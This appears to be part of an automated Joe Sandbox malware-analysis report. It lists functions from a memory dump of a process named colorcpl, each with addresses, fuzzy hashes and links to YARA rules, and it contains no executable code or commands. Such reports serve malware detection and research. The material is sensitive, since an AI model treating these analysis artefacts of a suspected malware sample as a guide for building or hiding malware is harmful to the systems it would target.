Function 04348470 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a670debbbcdada20abdee9928b53a62cbbf98e8c40f8016724e2f79aabc9098c
Instruction ID: 698411a4a3e398148d02cd492e18faec48df686213b14b7cabc2228906a078b4
Opcode Fuzzy Hash: a670debbbcdada20abdee9928b53a62cbbf98e8c40f8016724e2f79aabc9098c
Instruction Fuzzy Hash: 47319A716057418FDB24DF19C800B6AF7E9FB88700F15596DE8899B390E774F844CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0433D64A Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
Instruction ID: 8954abcb562b0854495eaee62ae71fea9ca1334a658016909e9a524a390e3b44
Opcode Fuzzy Hash: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
Instruction Fuzzy Hash: B531EF36600644AFEB21DE48C980F6AB3F9EF8075AF19A529ED199F250E734FD40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0437A5E7 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
Instruction ID: 1d5c0e5fbdb5e6d3329dff0b8d61477d2317879f5271030e00929bf262330f43
Opcode Fuzzy Hash: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
Instruction Fuzzy Hash: C6312972B04B00AFE774DF69C985B5BB7E8BF08B54F04192DA59AC3A50F630F9008B64

Uniqueness

Uniqueness Score: -1.00%

Function 043456E0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b8465b9e4f66fb862472ec90a23eb6164d68266b58fc00a2e08ee639d8609df
Instruction ID: 888ff6733ce8ba2dc76275edde883e393d1dacd882568ea6a93e2c1b392c6755
Opcode Fuzzy Hash: 5b8465b9e4f66fb862472ec90a23eb6164d68266b58fc00a2e08ee639d8609df
Instruction Fuzzy Hash: 08319A35B11905FFEB559F24CA80AA9BBB6FF84658F446065ED0197E61EB31F830CB80

Uniqueness

Uniqueness Score: -1.00%

Function 043EE750 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3de2884a9a1d12cd7891d16c8f4360f260785ea8c5e4f9cf613fc154c3dfae65
Instruction ID: adf236414935e5927c81bc78a7b28b5b0dc133266ae800de3f7c1962aacaf809
Opcode Fuzzy Hash: 3de2884a9a1d12cd7891d16c8f4360f260785ea8c5e4f9cf613fc154c3dfae65
Instruction Fuzzy Hash: C031C0715053129FCB20DF19C44196ABBE1FF89B19F0595AEE8889B250D730FD05CF92

Uniqueness

Uniqueness Score: -1.00%

Function 044117BC Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
Instruction ID: b462b4e78d58d16c7ab44e8ffcdd407153fa22b939df7703d0504b8b2a3940bb
Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
Instruction Fuzzy Hash: 36318EB2E00119EBCB14DF69C480AAEB7F1FF88315F15C16AE964DB351D734AA11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 043491E5 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
Instruction ID: 0d779e470491d85b5c2033d896dfff957506f3a3f08af4f10ad4c97c4eedce0e
Opcode Fuzzy Hash: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
Instruction Fuzzy Hash: E93189B16082498FCB15DF28D840A9BBBE9FF89754F0505AAFC5597360D630EC10CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0433C0F6 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8ed34717ddf10b1a693f23f002526a39e02361354f48402fd34770bfad231b6
Instruction ID: 75a9c86e2a235754bf215e56274db586cc49a0554b2cb4df2a18bbea7c6b04c3
Opcode Fuzzy Hash: e8ed34717ddf10b1a693f23f002526a39e02361354f48402fd34770bfad231b6
Instruction Fuzzy Hash: 133109B19002019BEF21AF18C842BB977F4EF41318F64E1A9D9459B392DE38FD85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 043744A8 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
Instruction ID: 75a1a7d956aa37e9bdbf6a4a90140801f47eea225d3c9f12b2afda055a5dd96d
Opcode Fuzzy Hash: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
Instruction Fuzzy Hash: B4215E76A00604ABCB21CFA8CA80A9ABBA5FF58324F108479ED459B241D774FE058F90

Uniqueness

Uniqueness Score: -1.00%

Function 0437D450 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6bfd66cb5e9593d61e70c3bbeb03039cb71b49dd140bdb3462865c9b01f0b67
Instruction ID: d635563da635e53aea7b3e62fb0127e6516926a20805433785b5165e78938fef
Opcode Fuzzy Hash: b6bfd66cb5e9593d61e70c3bbeb03039cb71b49dd140bdb3462865c9b01f0b67
Instruction Fuzzy Hash: 7521A0B1504701ABE620FF249840F5AB7ACEF44A6CF051819BA9197690E738F9048FA2

Uniqueness

Uniqueness Score: -1.00%

Function 04343536 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5cf72a728870ff7cb19f65ada926ad2da5871cddfaa0e6d236efb9c8fa4e6f7
Instruction ID: 941fa73af089fa1d6c36ccb2e34dd49c459899f588b8f86fbf7d242c69a7915f
Opcode Fuzzy Hash: d5cf72a728870ff7cb19f65ada926ad2da5871cddfaa0e6d236efb9c8fa4e6f7
Instruction Fuzzy Hash: 3A21DF31305601ABEB31AF04C984FAABBE4EFC4B15F562099EC4607651C774F848CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04379580 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 646e39fd6a7f85090f2da79a3059b33f8536da0d02fe8e037f406873b8af1ecb
Instruction ID: 8694993bc9781adeedd4c6946b5c9875b97bc84dd958f7134332b7b4f464e631
Opcode Fuzzy Hash: 646e39fd6a7f85090f2da79a3059b33f8536da0d02fe8e037f406873b8af1ecb
Instruction Fuzzy Hash: 3321D170201A12ABFF396E25C840B667BE5EF44678F102719E986469E0EB39F841DF91

Uniqueness

Uniqueness Score: -1.00%

Function 0441B781 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90e4179c84f2ab5222853fb2ad0b0599bfe9e0d6ac76da03f188279d987d44b4
Instruction ID: 5189dfc1a121469cc7daf048338c50e818e4812a5575442b474ec0eb594af7be
Opcode Fuzzy Hash: 90e4179c84f2ab5222853fb2ad0b0599bfe9e0d6ac76da03f188279d987d44b4
Instruction Fuzzy Hash: EA21AC36A00A95EFEF219E59C884F6BBBB8EF45B54F058066E8149B360D334FD01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 043FD430 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 575a3526d1c358682353366e68caeade6c1654175c3d3c744dba7750c30e3068
Instruction ID: 87ae955b66bbe5e1fc7e80e885885e1b3c15000cff657f5c69808df20409e0a5
Opcode Fuzzy Hash: 575a3526d1c358682353366e68caeade6c1654175c3d3c744dba7750c30e3068
Instruction Fuzzy Hash: 6A216F36600605AFDB22DF59CC44F6B77F9EF84764F215429EA1A87260DA30F901DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04362755 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10ca41b718e67d3ebba07e6573d4f47e354dd3c6dd88c5c856c415a03b24b709
Instruction ID: 60b48136ec51033da7b3494028a347c174e02939cc2a286f119540d0ccc35c61
Opcode Fuzzy Hash: 10ca41b718e67d3ebba07e6573d4f47e354dd3c6dd88c5c856c415a03b24b709
Instruction Fuzzy Hash: C621F932745A819BF32677688C48F253795EF45B74F2913E5ED229B6E2D768B810C210

Uniqueness

Uniqueness Score: -1.00%

Function 043C05C6 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07e41e14a1b0f101dd01ba6b94baa355f76727422211bc03ae0438567e2ff3d8
Instruction ID: 8e033e39ad08bd526d520f2bc8b95422c7b9be78d1f1c77fd77a8ce7fefd62ed
Opcode Fuzzy Hash: 07e41e14a1b0f101dd01ba6b94baa355f76727422211bc03ae0438567e2ff3d8
Instruction Fuzzy Hash: 5421D4B0E00218EBDB14DFAAD9819AEFBF8FF98B04F10512FE505A7250D774A941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 043614C9 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
Instruction ID: c14401b1d3f62c9c8cf8a5e1aa3641bee8f92f67bf70532323a360beb17cd2f8
Opcode Fuzzy Hash: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
Instruction Fuzzy Hash: 88213532381681CBEB26AB98C940F25B7E9EF44788F0950A0DD028B6A2E735FC60C710

Uniqueness

Uniqueness Score: -1.00%

Function 0433B705 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 64423af7562599aeb70b3bd3f19552e26dbe883310e0e23eb1e26f69013b1414
Instruction ID: 6ce391057a201902dffc32c5d8b52eb40307afb771c100facec3b501217c863f
Opcode Fuzzy Hash: 64423af7562599aeb70b3bd3f19552e26dbe883310e0e23eb1e26f69013b1414
Instruction Fuzzy Hash: 63215332141A41EFE726EF58C940F5AB7F5FF08B59F254969E4068B6A1CB38F801CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04348690 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7711b8985d691ab9899c806155d06b83ee4c3394aae4d9847d00003d389d6924
Instruction ID: aa17b2bd571ca3964e2a1b616cff36b07596b221e92ed211040d0598dff0dfaf
Opcode Fuzzy Hash: 7711b8985d691ab9899c806155d06b83ee4c3394aae4d9847d00003d389d6924
Instruction Fuzzy Hash: B511C8397016119BCF19DF49C4D0A9ABBE9AFCB7507155069ED08DF305D6B2F9018790

Uniqueness

Uniqueness Score: -1.00%

Function 04370044 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 890f1da43df6bf821c9fa0e63626150f351daea58c3e7afc6d4a7f240fe17a3e
Instruction ID: 1ea7f82a6d78900faa5c5c4aa03cd6979955c8417d9bd3cad0325051fc365964
Opcode Fuzzy Hash: 890f1da43df6bf821c9fa0e63626150f351daea58c3e7afc6d4a7f240fe17a3e
Instruction Fuzzy Hash: AD119073600604FFE736AF54D845F9EBBB8EF84768F10402AEA409B140D6B5F945C760

Uniqueness

Uniqueness Score: -1.00%

Function 04343640 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7310a4cda39c7721fbb27547af23cc8c5304dd9f96e9d05f830722eb36095a9
Instruction ID: 6568702ad3f77003f5d4e98af00156b327e41e81fc5463b66380fa127eb244d6
Opcode Fuzzy Hash: f7310a4cda39c7721fbb27547af23cc8c5304dd9f96e9d05f830722eb36095a9
Instruction Fuzzy Hash: 7221AF31A0020A9BFB25DF69C4887EEB6E4EFC8318F199018DD52572D0CBBCB945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04348009 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5f518e11986a5824ea4bcc93c31f59dec54e8614074e9d02ee68f09a3efe9c
Instruction ID: 2af1ee507edc0722761aacd28c767d828b8ad260a1477d9af4ab099fec8274cd
Opcode Fuzzy Hash: 7a5f518e11986a5824ea4bcc93c31f59dec54e8614074e9d02ee68f09a3efe9c
Instruction Fuzzy Hash: 65214C75A10605EFCB18DF98C580AAABBF5FB88718F20416DD505A7350D771BD46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0437666D Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1389a7a2160407989b7f62273708b3db032964f7454c408aece28aaa0e180818
Instruction ID: 1f5ebdde2676068a629469a144266a7e769ce3efb69065cb5f629763ffe21638
Opcode Fuzzy Hash: 1389a7a2160407989b7f62273708b3db032964f7454c408aece28aaa0e180818
Instruction Fuzzy Hash: D1214771600E40AFE7349F68C892F66B3F8FB44764F40982DE59AD7650DA34B840DB60

Uniqueness

Uniqueness Score: -1.00%

Function 043391F0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f51fe53642084a29343e7445cef9fdb38946d2f473329a2a5d3d2ebd501d933
Instruction ID: 7c4eb43fe454b48c1d2bd286dcdd5321a0a7f6c12d9d0c25382fbae587a7915c
Opcode Fuzzy Hash: 6f51fe53642084a29343e7445cef9fdb38946d2f473329a2a5d3d2ebd501d933
Instruction Fuzzy Hash: FF11EF7A112945EBE724EF50EA40A72B7E8EF98F86F101029E800D7390E338EC41C764

Uniqueness

Uniqueness Score: -1.00%

Function 043D6400 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f5758ce384d79f0dde733e51d09b33be1e4ccf918465028ac27d004458546f8
Instruction ID: 0b00540ab220cc8eefd1fa6b6b0fb6f3d3ab1af617f55b46743dfc915f179f77
Opcode Fuzzy Hash: 2f5758ce384d79f0dde733e51d09b33be1e4ccf918465028ac27d004458546f8
Instruction Fuzzy Hash: 3911C173380A00AFD722DF99E941F4A77B8EF59B54F20502AF614DB260DA70F800C790

Uniqueness

Uniqueness Score: -1.00%

Function 0436E7E0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d82572c23242fec189f9bf25cbd2d457e19101b9d545a198ac61e68fc190adbf
Instruction ID: 0e3a9d7267d86431821930ab2e56f767249eb915149c5632b4e562cdb40b5960
Opcode Fuzzy Hash: d82572c23242fec189f9bf25cbd2d457e19101b9d545a198ac61e68fc190adbf
Instruction Fuzzy Hash: 89110C36700101AFDF29DB24CC91A6F725ADFC5B74B259129D9179B294EA30F806C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 043C9567 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f65415da592af5ae0491dc9141284680ba64768c0cc009db42fe6677a0f877b
Instruction ID: 043e96340be7e00cda0ae287f89977a3c792966356b78a70bbd9c292e6ad30e2
Opcode Fuzzy Hash: 2f65415da592af5ae0491dc9141284680ba64768c0cc009db42fe6677a0f877b
Instruction Fuzzy Hash: 3F11E7B2B04115AFEB059F58C984B6EBABDEF48764F12416DE405E3300DB74AD00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 043E7591 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e08c3ef39625cc937e5ef79d23aaa8e6c8bf8c3a23c899516923c1d28c5df172
Instruction ID: 18ae216e8322f75383035f33d47a7a0ef3d85e92996329a951e90fc5d437c0e7
Opcode Fuzzy Hash: e08c3ef39625cc937e5ef79d23aaa8e6c8bf8c3a23c899516923c1d28c5df172
Instruction Fuzzy Hash: 0A214471A01629DFEB18DF99C490BECB3B0BB48329F20925AD525A62C1DB747802CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0440A464 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17b7fd83732ac97bf948158935cefa8ce054b86e1e540677a9e9fc5c72766afe
Instruction ID: 426c00ce97963db92cc7940f78852b26ee4b1c1b9ab70e76f51cd6fd7cf97d1e
Opcode Fuzzy Hash: 17b7fd83732ac97bf948158935cefa8ce054b86e1e540677a9e9fc5c72766afe
Instruction Fuzzy Hash: 13110436600A18AFDF19CF54CC05B9DB7B5EF84314F04826AEC46A7780E631BD61CB80

